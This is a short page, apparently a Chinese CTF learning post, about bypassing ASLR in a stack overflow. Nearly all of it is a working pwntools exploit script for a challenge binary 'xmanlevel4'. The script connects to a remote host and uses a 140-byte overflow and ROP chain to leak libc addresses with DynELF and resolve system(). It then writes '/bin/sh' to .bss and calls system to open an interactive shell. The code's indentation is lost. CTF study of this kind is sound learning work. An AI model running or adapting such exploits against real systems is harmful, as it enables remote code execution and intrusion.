exploit:
栈溢出学习之bypass ASLR:利用DynELF模块leak出内存地址
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from pwn import *
#p = remote('pwn2.jarvisoj.com', 9880)
p = remote('218.2.197.235',20433)
elf = ELF('./xmanlevel4')
writeplt = elf.symbols['write']
readplt = elf.symbols['read']
vulnaddr = 0x804844b
bssaddr = elf.bss(0x200)
pppraddr = 0x8048509
staraddr = 0x8048350
def leak(address):
payload = 'a'*140
payload += p32(writeplt)
payload += p32(vulnaddr)
payload += p32(1)
payload += p32(address)
payload += p32(4)
p.send(payload)
data = p.recv(4)
print "%#x => %s " % (address,(data or '').encode('hex'))
return data
dynelf = DynELF(leak,elf=ELF('./xmanlevel4'))
sysaddr = dynelf.lookup('system','libc')
print "system address is " + hex(sysaddr)
print "-----------------------------------"
payload1 = 'a' * 140
payload1 += p32(readplt)
payload1 += p32(pppraddr)
payload1 += p32(0)
payload1 += p32(bssaddr)
payload1 += p32(8)
payload1 += p32(sysaddr)
payload1 += p32(1)
payload1 += p32(bssaddr)
p.send(payload1)
p.send('/bin/sh\0')
p.interactive()
微信扫码加入知识星球【漏洞百出】
点击图片放大,扫码知识星球【漏洞百出】